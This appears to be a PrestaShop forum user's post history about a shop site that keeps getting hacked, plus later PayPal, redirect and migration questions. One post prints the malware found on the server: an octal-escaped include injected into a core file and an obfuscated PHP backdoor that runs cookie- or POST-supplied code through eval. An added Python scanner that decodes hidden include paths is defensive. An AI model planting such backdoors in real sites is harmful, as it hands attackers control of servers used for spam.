qzelle

Profile Information

  • First Name
    Liz
  • Last Name
    KNight

  1. Thanks for getting back to me on this and thanks for the specifics on what to look for in the access logs. Here's a handful of the first couple of search results for "POST":

     91.79.25.81 - - [01/Jul/2018:05:33:04 -0500] "POST /contact-us HTTP/1.0" 200 30038 "http://fractalspin.com/contact-us" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.65 Safari/537.36 OPR/26.0.1656.24"
     193.106.30.99 - - [01/Jul/2018:10:28:46 -0500] "POST /wp-content/yt.php HTTP/1.1" 444 0 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
     107.172.15.78 - - [01/Jul/2018:13:28:10 -0500] "POST //fractalspin.com/ HTTP/1.0" 200 42395 "http://www.google.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:25.0) Gecko/20100101 Firefox/25.0"
     89.107.184.55 - - [01/Jul/2018:13:45:38 -0500] "POST /js/?gtbw=skale HTTP/1.0" 200 2203 "https://fractalspin.com/js/?gtbw=skale" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
     79.110.18.136 - - [01/Jul/2018:14:47:14 -0500] "POST /index.php%3Fcontroller%3Dcontact HTTP/1.0" 200 97179 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
     198.23.213.6 - - [01/Jul/2018:16:31:27 -0500] "POST /contact-us HTTP/1.0" 200 42395 "http://www.google.com" "Mozilla/5.0 (IE 11.0; Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; rv:11.0) like Gecko"

     Weirdly, there are no "/contact us" or "wp-content/yt.php" directories or files in the Prestashop directory. However, there is a hacked file in the /js/ directory: https://0bin.net/paste/LmMYAebUA2IRBUme#S7Fs8-cK3/kJ+5pRiITG6TYQmGkise3QJA/dWqJMRm2

     I appreciate the offer of looking into this. Here's the whole July log: https://gist.githubusercontent.com/quantazelle/c837669ee2f11822f805aae327e56e99/raw/f72b4cf2e5148c8e5344d6f291964209a8bc03b5/fractalspin.initializemedia.com-Jul-2018

     Thanks, Datakick!
  2. My sites keep getting hacked and it's a particular hack that inserts escaped html. Then it progresses to spam being sent from my server and shutting down the shared hosting account for being over resources. Here's an example:

     home/i***/public_html/fractals**.com/css/index.php

         <?php
         /*301f7*/

         @include "\057hom\145/in\151tia\065/pu\142lic\137htm\154/fr\141cta\154spi\156.co\155/cl\141sse\163/mo\144ule\057.68\143bfa\1447.i\143o";

         /*301f7*/

         /*
          * 2007-2017 PrestaShop
          *
          * NOTICE OF LICENSE
          *
          * This source file is subject to the Open Software License (OSL 3.0)
          * that is bundled with this package in the file LICENSE.txt.
          * It is also available through the world-wide-web at this URL:
          * http://opensource.org/licenses/osl-3.0.php
          * If you did not receive a copy of the license and are unable to
          * obtain it through the world-wide-web, please send an email
          * to [email protected] so we can send you a copy immediately.
          *
          * DISCLAIMER
          *
          * Do not edit or add to this file if you wish to upgrade PrestaShop to newer
          * versions in the future. If you wish to customize PrestaShop for your
          * needs please refer to http://www.prestashop.com for more information.
          *
          * @author PrestaShop SA <[email protected]>
          * @copyright 2007-2017 PrestaShop SA
          * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
          * International Registered Trademark & Property of PrestaShop SA
          */

         header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
         header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
         header("Cache-Control: no-store, no-cache, must-revalidate");
         header("Cache-Control: post-check=0, pre-check=0", false);
         header("Pragma: no-cache");
         header("Location: ../");
         exit;

     Then I'll get a random-letter.php file inserted in the same directory, like so:

     Containing

         <?php $scgcwgc = '23p61vsfr-8#*ae0oy_uxHt594ck\'gmdil7nb';$nocgph = Array();$nocgph[] = $scgcwgc[21].$scgcwgc[12];$nocgph[] = $scgcwgc[11];$nocgph[] = $scgcwgc[15].$scgcwgc[31].$scgcwgc[7].$scgcwgc[23].$scgcwgc[1].$scgcwgc[31].$scgcwgc[23].$scgcwgc[1].$scgcwgc[9].$scgcwgc[23].$scgcwgc[15].$scgcwgc[31].$scgcwgc[13].$scgcwgc[9].$scgcwgc[25].$scgcwgc[31].$scgcwgc[26].$scgcwgc[3].$scgcwgc[9].$scgcwgc[13].$scgcwgc[34].$scgcwgc[31].$scgcwgc[26].$scgcwgc[9].$scgcwgc[0].$scgcwgc[24].$scgcwgc[3].$scgcwgc[36].$scgcwgc[15].$scgcwgc[15].$scgcwgc[26].$scgcwgc[10].$scgcwgc[0].$scgcwgc[34].$scgcwgc[0].$scgcwgc[4];$nocgph[] = $scgcwgc[26].$scgcwgc[16].$scgcwgc[19].$scgcwgc[35].$scgcwgc[22];$nocgph[] = $scgcwgc[6].$scgcwgc[22].$scgcwgc[8].$scgcwgc[18].$scgcwgc[8].$scgcwgc[14].$scgcwgc[2].$scgcwgc[14].$scgcwgc[13].$scgcwgc[22];$nocgph[] = $scgcwgc[14].$scgcwgc[20].$scgcwgc[2].$scgcwgc[33].$scgcwgc[16].$scgcwgc[31].$scgcwgc[14];$nocgph[] = $scgcwgc[6].$scgcwgc[19].$scgcwgc[36].$scgcwgc[6].$scgcwgc[22].$scgcwgc[8];$nocgph[] = $scgcwgc[13].$scgcwgc[8].$scgcwgc[8].$scgcwgc[13].$scgcwgc[17].$scgcwgc[18].$scgcwgc[30].$scgcwgc[14].$scgcwgc[8].$scgcwgc[29].$scgcwgc[14];$nocgph[] = $scgcwgc[6].$scgcwgc[22].$scgcwgc[8].$scgcwgc[33].$scgcwgc[14].$scgcwgc[35];$nocgph[] = $scgcwgc[2].$scgcwgc[13].$scgcwgc[26].$scgcwgc[27];foreach ($nocgph[7]($_COOKIE, $_POST) as $tmqgiuw => $xienbb){function paloe($nocgph, $tmqgiuw, $duopzf){return $nocgph[6]($nocgph[4]($tmqgiuw . $nocgph[2], ($duopzf / $nocgph[8]($tmqgiuw)) + 1), 0, $duopzf);}function tsqylud($nocgph, $anjcq){return @$nocgph[9]($nocgph[0], $anjcq);}function pslmija($nocgph, $anjcq){$pqbygpl = $nocgph[3]($anjcq) % 3;if (!$pqbygpl) {eval($anjcq[1]($anjcq[2]));exit();[spam-filter]$xienbb = tsqylud($nocgph, $xienbb);pslmija($nocgph, $nocgph[5]($nocgph[1], $xienbb ^ paloe($nocgph, $tmqgiuw, $nocgph[8]($xienbb))));}

     Here are the things I've done to secure my server (I do this over and over)

       • Delete all the Prestashop files from the server, retaining the (cleaned, if necessary) files from the old install, like config and image files
           • config/settings.inc.php
           • folder with name of custom-named admin area (let's call it "custom-admin/")
           • img/ images used for header ("logo.png" or "your-store-name.png")
           • img/c folder (categories)
           • img/p folder (products)
           • modules/ folder
       • Reinstall Prestashop (or Wordpress), deleting all the infected files and replacing it with a clean install
       • Change the mysql user password for the install
       • Change the FTP password
       • Change the Cpanel password

     They're not getting in through FTP or Cpanel or those things would work.

     I have managed to cut down attacks on the Wordpress site using Wordfence and enabling the shared-hosting settings. However I still can't figure out what's attacking, and the site logs are too massive and I don't know what I'm looking for.

     Any insight would be appreciated... if I can't get this under control I'm going to have to move back to the Wordpress solution because at least they have a tool that cuts down hacking.
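
An added example, not part of the original post: a Python scanner for the kind of injection shown in the css/index.php sample above, where an `@include` hides its target path behind octal escapes. It decodes the path so the dropped payload file can be located; the function names and the sample marker, path and file name are constructed for this example.

```python
import re
from pathlib import Path

# include/require (optionally @-silenced) of a double-quoted string literal.
INCLUDE_RE = re.compile(
    r'@?\s*\b(?:include|require)(?:_once)?\b\s*\(?\s*"((?:[^"\\]|\\.)*)"',
    re.IGNORECASE,
)
# PHP double-quoted escapes that can hide a path: \NNN (octal) and \xHH (hex).
ESCAPE_RE = re.compile(r'\\([0-7]{1,3})|\\x([0-9A-Fa-f]{1,2})')


def decode_php_escapes(literal):
    """Resolve octal and hex escapes the way PHP does inside double quotes."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 8) & 0xFF)
        return chr(int(m.group(2), 16))
    return ESCAPE_RE.sub(repl, literal)


def find_obfuscated_includes(source):
    """Return the decoded target of every include whose path uses escapes."""
    return [
        decode_php_escapes(m.group(1))
        for m in INCLUDE_RE.finditer(source)
        if ESCAPE_RE.search(m.group(1))
    ]


def scan_tree(root):
    """Map each .php file under root to the hidden include targets it contains."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        hits = find_obfuscated_includes(path.read_text(errors="replace"))
        if hits:
            findings[str(path)] = hits
    return findings


# Constructed samples (marker, path and file name are made up for this example).
INFECTED = r'<?php /*abc12*/ @include "\057var\057www/sh\157p/cl\141sses/.0a1b2c3d.i\143o"; /*abc12*/ header("Location: ../"); exit;'
CLEAN = r'<?php require_once "config/settings.inc.php"; include "lang\nfile.php";'

if __name__ == "__main__":
    print(find_obfuscated_includes(INFECTED))
    print(find_obfuscated_includes(CLEAN))
```

Each decoded target is a second file to inspect and remove along with the injected line; kept directories such as modules/ and img/ need scanning too, since they survive a reinstall.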
  3. My site got hacked and modified or added a bunch of files, so I reinstalled it from the same version. It's 1.1.1.8 http://fractalspin.com I copied over these files and directories to preserve images and settings: /config/settings.inc.php /img/fractalspin-logo-1424723349.jpg (site logo) /img/s /img/p /modules/themeconfigurator/img/ The product images are not showing up, nor are the product pages: http://fractalspin.com/jewelry/44-cat-5-earrings.html What am I doing wrong?
  4. Neither of those options worked. Is there a way I can manually import products and orders into the latest version?
  5. So my site got hacked and random files were added. I cleaned up the site and moved to a new server but the cpanel restore resulted in a blank page. I tried re-installing the version it was on, but still got a blank page. I tried the upgrade to the latest version, and still got a blank page. I tried resetting everything and upgrading to the version above the one I had and still got a blank page. I'm out of options at this point. Is there a way to export the orders and products and start over with a new install? It's all I can think of. :-(

     settings.inc.php (redacted = "~NNN~"):

         <?php
         define('_DB_SERVER_', 'localhost');
         define('_DB_NAME_', '~NNN~');
         define('_DB_USER_', '~NNN~');
         define('_DB_PASSWD_', '~NNN~');
         define('_DB_PREFIX_', '~NNN~');
         define('_MYSQL_ENGINE_', 'InnoDB');
         define('_PS_CACHING_SYSTEM_', 'CacheMemcache');
         define('_PS_CACHE_ENABLED_', '0');
         define('_PS_DIRECTORY_', '/');
         define('_COOKIE_KEY_', '~NNN~');
         define('_COOKIE_IV_', '~NNN~');
         define('_PS_CREATION_DATE_', '2015-02-23');
         if (!defined('_PS_VERSION_'))
             define('_PS_VERSION_', '1.6.1.13');
         define('_RIJNDAEL_KEY_', '~NNN~');
         define('_RIJNDAEL_IV_', '~NNN~');
  6. @Akhenaten: Sorry, fixed that. Same problem with the extra slash removed. Redirects “fractalspin.com/products/Electronic-Musicians-Emergency-Adapters.html” is currently being redirected to: http://fractalspin.com/home/17-electronic-musician-s-emergency-adapters.html
  7. My old site was on BigCommerce, so I was hoping to redirect the most popular products over to the new store, but I get a 404. Going through cPanel, I did this:

     “fractalspin.com/products/Electronic-Musicians-Emergency-Adapters.html” is currently being redirected to: http://fractalspin.com/home/17-electronic-musician-s-emergency-adapters.html

     which resulted in .htaccess code added at the end:

         RewriteCond %{HTTP_HOST} ^fractalspin\.com$ [OR]
         RewriteCond %{HTTP_HOST} ^www\.fractalspin\.com$
         RewriteRule ^products\/Electronic\-Musicians\-Emergency\-Adapters\.html$ "http\:\/\/fractalspin\.com\/home\/17\-electronic\-musician\-s\-emergency\-adapters\.html" [R=301,L]

     And I get a 404 error wrapped in Prestashop:

     Any idea how to fix this? Thanks!
  8. OK, I re-enabled PayPal 1.3.9. Clicking on the first image goes to PayPal, but it just reloads the sign-in screen and doesn't pass any order info. I think this is the error in the console? webscr?cmd=_flow&SESSION=cgn1rX_CubX71wap0nuRKI-c6lN61hF9gs0kdfetYunALEDf043yfoVTINy&dispatch=50a22…:22 Resource interpreted as Document but transferred with MIME type image/gif: "https://www.paypal.com/en_US/i/scr/scr_grayDotRepeatBg_3x1.gif".
  9. OK looks like other people are having this issue with javascript(0); dead links: https://www.prestashop.com/forums/topic/453394-paypal-link-dead-javascriptvoid0/ I tried downgrading the Paypal module to PayPal 3.6.8.zip, which does get rid of the dead link, but then it times out at the login page https://www.paypal.com/websc&cmd=_express-checkout&token=EC-24T28174RF027923N#/checkout/login
  10. OK, I switched over to the other version of the PayPal version, but now when I click on the "PAY WITH PAYPAL OR YOUR CREDIT CARD" at checkout, I just get a javascript error and nothing happens.
  11. I tried that. Here are the settings now, but I still have the same problem.
  12. Oh, sorry, it's PayPal USA, Canada v1.3.9 - by PrestaShop - Here's the settings page: